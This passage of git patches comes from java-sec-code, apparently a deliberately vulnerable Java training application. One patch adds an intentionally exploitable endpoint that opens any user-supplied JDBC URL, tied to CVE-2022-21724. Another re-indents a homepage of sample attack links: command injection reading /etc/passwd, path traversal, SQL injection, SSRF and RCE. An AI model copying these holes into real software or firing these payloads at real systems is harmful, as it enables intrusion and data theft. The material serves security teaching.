                     newDecimalIP.append(ip).append(".");
                 }
@@ -246,7 +249,7 @@ private static boolean isNumber(String str) {
         }
         for (int i = 0; i < str.length(); i++) {
             char ch = str.charAt(i);
-            if (ch < 48 || ch > 57) {
+            if (ch < '0' || ch > '9') {
                 return false;
             }
         }
@@ -261,7 +264,7 @@ private static boolean isNumber(String str) {
     private static boolean isNumberOrDot(String s) {
         for (int i = 0; i < s.length(); i++) {
             char ch = s.charAt(i);
-            if ((ch < 48 || ch > 57) && ch != 46){
+            if ((ch < '0' || ch > '9') && ch != '.'){
                 return false;
             }
         }
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 2c248b29..c1eac95c 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -94,7 +94,6 @@ public static String URLConnection(String url) {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
-            // BufferedReader in = new BufferedReader(new InputStreamReader(u.openConnection().getInputStream()));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
diff --git a/src/main/java/org/joychou/util/WebUtils.java b/src/main/java/org/joychou/util/WebUtils.java
index 4816df8e..0445f310 100644
--- a/src/main/java/org/joychou/util/WebUtils.java
+++ b/src/main/java/org/joychou/util/WebUtils.java
@@ -2,9 +2,7 @@
 
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
-import java.io.File;
-import java.io.IOException;
-import java.io.InputStream;
+import java.io.*;
 
 import com.google.common.base.Preconditions;
 import org.springframework.web.util.HtmlUtils;
@@ -17,7 +15,6 @@ public static String getRequestBody(HttpServletRequest request) throws IOExcepti
         return convertStreamToString(in);
     }
 
-
     // https://stackoverflow.com/questions/309424/how-do-i-read-convert-an-inputstream-into-a-string-in-java
     public static String convertStreamToString(java.io.InputStream is) {
         java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");

From cab74a4eaaf4ec18433336c25afcea3fa390761b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 24 Mar 2023 17:51:29 +0800
Subject: [PATCH 094/108] fix #70

---
 java-sec-code.iml                             |  4 +-
 pom.xml                                       |  9 +++-
 src/main/java/org/joychou/controller/Rce.java | 14 ++++++
 src/main/java/org/joychou/controller/XXE.java |  2 +-
 src/main/resources/templates/index.html       | 44 +++++++++----------
 5 files changed, 48 insertions(+), 25 deletions(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index a20476ae..6946c265 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -212,7 +212,7 @@
     <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-metadata:1.2.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
     <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
-    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.16" level="project" />
+    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.20" level="project" />
     <orderEntry type="library" name="Maven: org.yaml:snakeyaml:1.21" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
@@ -228,5 +228,7 @@
     <orderEntry type="library" name="Maven: net.minidev:json-smart:2.2.1" level="project" />
     <orderEntry type="library" name="Maven: net.minidev:accessors-smart:1.1" level="project" />
     <orderEntry type="library" name="Maven: org.xmlbeam:xmlprojector:1.4.13" level="project" />
+    <orderEntry type="library" name="Maven: org.postgresql:postgresql:42.3.1" level="project" />
+    <orderEntry type="library" scope="RUNTIME" name="Maven: org.checkerframework:checker-qual:3.5.0" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 9ee03372..8da3449d 100644
--- a/pom.xml
+++ b/pom.xml
@@ -260,7 +260,7 @@
         <dependency>
             <groupId>org.projectlombok</groupId>
             <artifactId>lombok</artifactId>
-            <version>1.18.16</version>
+            <version>1.18.20</version>
             <scope>provided</scope>
         </dependency>
 
@@ -330,6 +330,13 @@
             <version>1.4.13</version>
         </dependency>
 
+        <!-- CVE-2022-21724 -->
+        <dependency>
+            <groupId>org.postgresql</groupId>
+            <artifactId>postgresql</artifactId>
+            <version>42.3.1</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index 6d6a3417..a87a9672 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -1,6 +1,7 @@
 package org.joychou.controller;
 
 import groovy.lang.GroovyShell;
+import lombok.extern.slf4j.Slf4j;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
@@ -14,6 +15,7 @@
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
+import java.sql.DriverManager;
 
 
 /**
@@ -21,6 +23,7 @@
  *
  * @author JoyChou @ 2018-05-24
  */
+@Slf4j
 @RestController
 @RequestMapping("/rce")
 public class Rce {
@@ -128,5 +131,16 @@ public void groovyshell(String content) {
         groovyShell.evaluate(content);
     }
 
+    /**
+     * <a href="https://github.com/JoyChou93/java-sec-code/wiki/CVE-2022-21724">CVE-2022-21724</a>
+     */
+    @RequestMapping("/postgresql")
+    public void postgresql(String jdbcUrlBase64) throws Exception{
+        byte[] b = java.util.Base64.getDecoder().decode(jdbcUrlBase64);
+        String jdbcUrl = new String(b);
+        log.info(jdbcUrl);
+        DriverManager.getConnection(jdbcUrl);
+    }
+
 }
 
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 36372727..08f3073e 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -234,7 +234,7 @@ public String DigesterSec(HttpServletRequest request) {
      * Use request.getInputStream to support UTF16 encoding.
      */
     @RequestMapping(value = "/DocumentBuilder/vuln", method = RequestMethod.POST)
-    public String DocumentBuilderVuln01(HttpServletRequest request) {
+    public String DocumentBuilderVuln(HttpServletRequest request) {
         try {
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 8511d5fd..057aa067 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -5,29 +5,29 @@
     <title>Home Page</title>
 </head>
 <body>
-    <p>Hello <span th:text="${user}"></span>.</p>
-    <p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
-    <p>
-        <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
-        <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
-        <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
-        <a th:href="@{/file/pic}">Picture Upload</a>&nbsp;&nbsp;
-        <a th:href="@{/file/any}">File Upload</a>&nbsp;&nbsp;
-        <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
-        <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
-        <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
-        <a th:href="@{/ssrf/urlConnection/vuln?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
-        <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
-        <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
-        <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
-    </p>
+<p>Hello <span th:text="${user}"></span>.</p>
+<p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
+<p>
+    <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
+    <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
+    <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
+    <a th:href="@{/file/pic}">Picture Upload</a>&nbsp;&nbsp;
+    <a th:href="@{/file/any}">File Upload</a>&nbsp;&nbsp;
+    <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
+    <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
+    <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
+    <a th:href="@{/ssrf/urlConnection/vuln?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
+    <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>&nbsp;&nbsp;
+    <a th:href="@{/ooxml/upload}">ooxml XXE</a>&nbsp;&nbsp;
+    <a th:href="@{/xlsx-streamer/upload}">xlsx-streamer XXE</a>
+</p>
 
-    <P>
-        <a th:href="@{/jwt/createToken}">JWTCreateToken</a>
-        <a th:href="@{/jwt/getName}">GetUserFromJWTToken</a>
-    </P>
-    <p>...</p>
-    <a th:href="@{/logout}">logout</a>
+<P>
+    <a th:href="@{/jwt/createToken}">JWTCreateToken</a>
+    <a th:href="@{/jwt/getName}">GetUserFromJWTToken</a>
+</P>
+<p>...</p>
+<a th:href="@{/logout}">logout</a>
 
 </body>
 </html>
\ No newline at end of file

From 4ede83ab929b53c8ad600e1a63c961433e82a97d Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 28 Apr 2023 11:28:50 +0800
Subject: [PATCH 095/108] add jdbc & actuator ak_secret

---
 java-sec-code.iml                             | 228 +-----------------
 pom.xml                                       |   7 +
 .../java/org/joychou/controller/Jdbc.java     |  36 +++
 .../java/org/joychou/controller/Log4j.java    |   5 +
 src/main/java/org/joychou/controller/Rce.java |  17 +-
 src/main/java/org/joychou/controller/XXE.java |   2 +-
 .../joychou/security/ssrf/SSRFChecker.java    |  77 +++---
 src/main/resources/application.properties     |   5 +-
 src/main/resources/templates/index.html       |   1 +
 9 files changed, 104 insertions(+), 274 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Jdbc.java

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 6946c265..1daccaec 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -1,234 +1,8 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+<module version="4">
   <component name="FacetManager">
     <facet type="Spring" name="Spring">
       <configuration />
     </facet>
-    <facet type="web" name="Web">
-      <configuration>
-        <webroots>
-          <root url="file://$MODULE_DIR$/src/main/webapp" relative="/" />
-        </webroots>
-      </configuration>
-    </facet>
-  </component>
-  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
-    <output url="file://$MODULE_DIR$/target/classes" />
-    <output-test url="file://$MODULE_DIR$/target/test-classes" />
-    <content url="file://$MODULE_DIR$">
-      <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
-      <sourceFolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
-      <excludeFolder url="file://$MODULE_DIR$/target" />
-    </content>
-    <orderEntry type="inheritedJdk" />
-    <orderEntry type="sourceFolder" forTests="false" />
-    <orderEntry type="module-library">
-      <library>
-        <CLASSES>
-          <root url="jar://$USER_HOME$/Desktop/challenge-0.0.1-SNAPSHOT.jar!/" />
-        </CLASSES>
-        <JAVADOC />
-        <SOURCES />
-      </library>
-    </orderEntry>
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: ch.qos.logback:logback-classic:1.1.9" level="project" />
-    <orderEntry type="library" name="Maven: ch.qos.logback:logback-core:1.1.9" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-annotations-api:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.hibernate:hibernate-validator:5.3.4.Final" level="project" />
-    <orderEntry type="library" name="Maven: javax.validation:validation-api:1.1.0.Final" level="project" />
-    <orderEntry type="library" name="Maven: org.jboss.logging:jboss-logging:3.3.0.Final" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.8.6" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.8.0" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.8.6" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-web:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-webmvc:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-thymeleaf:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf-spring4:2.1.5.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf:2.1.5.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: ognl:ognl:3.0.8" level="project" />
-    <orderEntry type="library" name="Maven: org.unbescape:unbescape:1.1.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect:1.4.0" level="project" />
-    <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
-    <orderEntry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
-    <orderEntry type="library" name="Maven: com.google.protobuf:protobuf-java:2.6.0" level="project" />
-    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.24" level="project" />
-    <orderEntry type="library" name="Maven: org.jdom:jdom2:2.0.6" level="project" />
-    <orderEntry type="library" name="Maven: org.dom4j:dom4j:2.1.0" level="project" />
-    <orderEntry type="library" name="Maven: jaxen:jaxen:1.1.6" level="project" />
-    <orderEntry type="library" name="Maven: com.google.guava:guava:23.0" level="project" />
-    <orderEntry type="library" name="Maven: com.google.code.findbugs:jsr305:1.3.9" level="project" />
-    <orderEntry type="library" name="Maven: com.google.errorprone:error_prone_annotations:2.0.18" level="project" />
-    <orderEntry type="library" name="Maven: com.google.j2objc:j2objc-annotations:1.1" level="project" />
-    <orderEntry type="library" name="Maven: org.codehaus.mojo:animal-sniffer-annotations:1.14" level="project" />
-    <orderEntry type="library" name="Maven: commons-collections:commons-collections:3.1" level="project" />
-    <orderEntry type="library" name="Maven: commons-lang:commons-lang:2.4" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpclient:4.5.12" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpcore:4.4.6" level="project" />
-    <orderEntry type="library" name="Maven: commons-codec:commons-codec:1.10" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:fluent-hc:4.3.6" level="project" />
-    <orderEntry type="library" name="Maven: commons-logging:commons-logging:1.1.3" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
-    <orderEntry type="library" name="Maven: com.squareup.okhttp:okhttp:2.5.0" level="project" />
-    <orderEntry type="library" name="Maven: com.squareup.okio:okio:1.6.0" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
-    <orderEntry type="library" name="Maven: cglib:cglib:2.2.2" level="project" />
-    <orderEntry type="library" name="Maven: asm:asm:3.3.1" level="project" />
-    <orderEntry type="library" name="Maven: org.jolokia:jolokia-core:1.6.0" level="project" />
-    <orderEntry type="library" name="Maven: com.googlecode.json-simple:json-simple:1.1.1" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-actuator:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-actuator:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-eureka-client:1.4.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter:1.1.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-context:1.1.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-crypto:4.2.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-commons:1.1.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-rsa:1.0.3.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.bouncycastle:bcpkix-jdk15on:1.55" level="project" />
-    <orderEntry type="library" name="Maven: org.bouncycastle:bcprov-jdk15on:1.55" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-netflix-core:1.2.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-netflix-eureka-client:1.2.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-client:1.4.11" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.jettison:jettison:1.3.7" level="project" />
-    <orderEntry type="library" name="Maven: stax:stax-api:1.0.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-eventbus:0.3.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-infix:0.3.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: commons-jxpath:commons-jxpath:1.3" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: joda-time:joda-time:2.9.7" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.antlr:antlr-runtime:3.4" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.antlr:stringtemplate:3.2.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: antlr:antlr:2.7.7" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.code.gson:gson:2.8.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.apache.commons:commons-math:2.2" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.archaius:archaius-core:0.7.4" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.ws.rs:jsr311-api:1.1.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.servo:servo-core:0.10.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.servo:servo-internal:0.10.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey:jersey-core:1.19.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey:jersey-client:1.19.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey.contribs:jersey-apache-client4:1.19.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject:guice:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.inject:javax.inject:1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator-api:1.12.10" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-core:1.4.11" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator:1.12.10" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator-core:1.12.10" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-multibindings:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-grapher:4.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject.extensions:guice-assistedinject:4.0" level="project" />
-    <orderEntry type="library" name="Maven: org.ow2.asm:asm:5.0.4" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:woodstox-core-asl:4.4.1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: javax.xml.stream:stax-api:1.0-2" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.woodstox:stax2-api:3.1.4" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-archaius:1.4.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: commons-configuration:commons-configuration:1.8" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-starter-netflix-ribbon:1.4.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.ribbon:ribbon-transport:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty-contexts:0.4.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty-servo:0.4.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.hystrix:hystrix-core:1.5.5" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.hdrhistogram:HdrHistogram:2.1.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.reactivex:rxnetty:0.4.9" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-codec-http:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-codec:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-handler:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-transport-native-epoll:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-common:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-buffer:4.0.27.Final" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: io.netty:netty-transport:4.0.27.Final" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-core:2.2.0" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-httpclient:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-commons-util:0.1.1" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-loadbalancer:2.2.0" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-statistics:0.1.1" level="project" />
-    <orderEntry type="library" name="Maven: io.reactivex:rxjava:1.1.10" level="project" />
-    <orderEntry type="library" name="Maven: com.netflix.ribbon:ribbon-eureka:2.2.0" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml.uuid:java-uuid-generator:3.1.4" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-web:4.2.12.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: aopalliance:aopalliance:1.0" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-core:4.2.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-beans:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-context:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-core:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-expression:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-config:4.2.12.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-aop:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-security:2.1.5.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: commons-net:commons-net:3.6" level="project" />
-    <orderEntry type="library" name="Maven: commons-httpclient:commons-httpclient:3.1" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-starter:1.3.2" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-jdbc:1.5.1.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-jdbc:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:8.5.85" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-jdbc:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-tx:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-autoconfigure:1.3.2" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis:mybatis:3.4.6" level="project" />
-    <orderEntry type="library" name="Maven: org.mybatis:mybatis-spring:1.3.2" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.velocity:velocity:1.7" level="project" />
-    <orderEntry type="library" name="Maven: com.thoughtworks.xstream:xstream:1.4.10" level="project" />
-    <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
-    <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi:3.10-FINAL" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml:3.9" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml-schemas:3.9" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.xmlbeans:xmlbeans:2.3.0" level="project" />
-    <orderEntry type="library" name="Maven: dom4j:dom4j:1.6.1" level="project" />
-    <orderEntry type="library" name="Maven: com.monitorjbl:xlsx-streamer:2.0.0" level="project" />
-    <orderEntry type="library" name="Maven: com.rackspace.apache:xerces2-xsd11:2.11.1" level="project" />
-    <orderEntry type="library" name="Maven: com.rackspace.eclipse.webtools.sourceediting:org.eclipse.wst.xml.xpath2.processor:2.1.100" level="project" />
-    <orderEntry type="library" name="Maven: edu.princeton.cup:java-cup:10k" level="project" />
-    <orderEntry type="library" name="Maven: com.ibm.icu:icu4j:4.6" level="project" />
-    <orderEntry type="library" name="Maven: xml-resolver:xml-resolver:1.2" level="project" />
-    <orderEntry type="library" name="Maven: xml-apis:xml-apis:1.4.01" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: org.jsoup:jsoup:1.10.2" level="project" />
-    <orderEntry type="library" name="Maven: commons-io:commons-io:2.5" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpasyncclient:4.1.4" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.httpcomponents:httpcore-nio:4.4.10" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger2:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.swagger:swagger-annotations:1.5.20" level="project" />
-    <orderEntry type="library" name="Maven: io.swagger:swagger-models:1.5.20" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-spi:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-core:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: net.bytebuddy:byte-buddy:1.8.12" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-schema:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-common:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: io.springfox:springfox-spring-web:2.9.2" level="project" />
-    <orderEntry type="library" name="Maven: com.fasterxml:classmate:1.3.3" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-core:1.2.0.RELEASE" level="project" />
